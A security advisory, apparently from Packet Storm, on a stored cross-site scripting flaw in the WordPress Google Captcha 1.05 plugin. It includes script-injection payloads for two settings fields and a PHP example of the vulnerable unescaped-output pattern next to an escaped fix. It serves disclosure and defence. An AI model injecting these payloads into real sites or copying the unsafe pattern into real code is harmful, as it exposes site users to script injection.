WordPress Google Captcha 1.05 Cross Site Scripting

2015-12-17T00:00:00
ID PACKETSTORM:134894
Type packetstorm
Reporter Madhu Akula
Modified 2015-12-17T00:00:00

Description

                                        
                                            `Plugin Name : Google Captcha (reCAPTCHA)  
  
Affected Version : 1.05 (and most probably lower versions, if any)
  
Vulnerability : A3-Cross-Site Scripting (XSS)  
  
Identified by : Madhu Akula  
  
  
  
Technical Details  
  
Minimum Level of Access Required : Administrator  
  
PoC - (Proof of Concept) :  
  
Submitting the payloads below in the following fields of the plugin settings page stores them and they are rendered back unescaped:

http://localhost/wp-admin/admin.php?page=google-captcha.php

gglcptch_public_key = "><script>alert(1)</script>

gglcptch_private_key = "><script>alert(2)</script>
  
  
Vulnerable Parameter : gglcptch_public_key, gglcptch_private_key  
  
Type of XSS : Stored  
  
Fixed in : 1.06  
  
http://wordpress.org/plugins/google-captcha/changelog/  
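As an added illustration (not the plugin's own code), the pattern that produces this class of stored XSS in an options page, next to the escaped version using WordPress's esc_attr() and a sanitize callback on save. The function names, the option group name and the hook registration are assumptions; only the option names come from the advisory.

```php
<?php
// Added illustration, not code from the Google Captcha plugin. Option names
// follow the advisory; function names and the option group are hypothetical.

// Unsafe pattern: the stored option is echoed raw inside a double-quoted
// attribute. A value such as  "><script>alert(1)</script>  closes the
// attribute and the tag, so the markup executes on every admin page load.
function gglcptch_render_key_field_unsafe( $option ) {
    $value = get_option( $option, '' );
    echo '<input type="text" name="' . $option . '" value="' . $value . '" />';
}

// Hardened pattern: esc_attr() HTML-encodes " ' < > & so the stored value
// cannot break out of the attribute, whatever was saved.
function gglcptch_render_key_field_safe( $option ) {
    $value = get_option( $option, '' );
    printf(
        '<input type="text" name="%s" value="%s" />',
        esc_attr( $option ),
        esc_attr( $value )
    );
}

// Defence in depth: also sanitize on save. reCAPTCHA keys are plain tokens,
// so stripping tags and control characters loses nothing legitimate.
function gglcptch_sanitize_key( $value ) {
    return sanitize_text_field( $value );
}

// Register both options with the sanitize callback (third argument form,
// accepted by register_setting() in the WordPress versions of that time).
add_action( 'admin_init', function () {
    foreach ( array( 'gglcptch_public_key', 'gglcptch_private_key' ) as $option ) {
        register_setting( 'gglcptch_options', $option, 'gglcptch_sanitize_key' );
    }
} );
```

Output escaping is the actual fix; the sanitize callback only limits what reaches the database and must not be relied on alone.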
  
Disclosure Timeline  
  
Vendor Contacted : 2014-08-04  
  
Plugin Status : Updated on 2014-08-07  
  
Public Disclosure : October 3, 2015  
  
CVE Number : Not assigned yet  
  
Plugin Description :  
  
The Google Captcha plugin allows you to implement a super security captcha form into web forms. Google Captcha is a free CAPTCHA service that helps to digitize books, newspapers and old time radio shows. This captcha can be used for login, registration, password recovery, comments forms.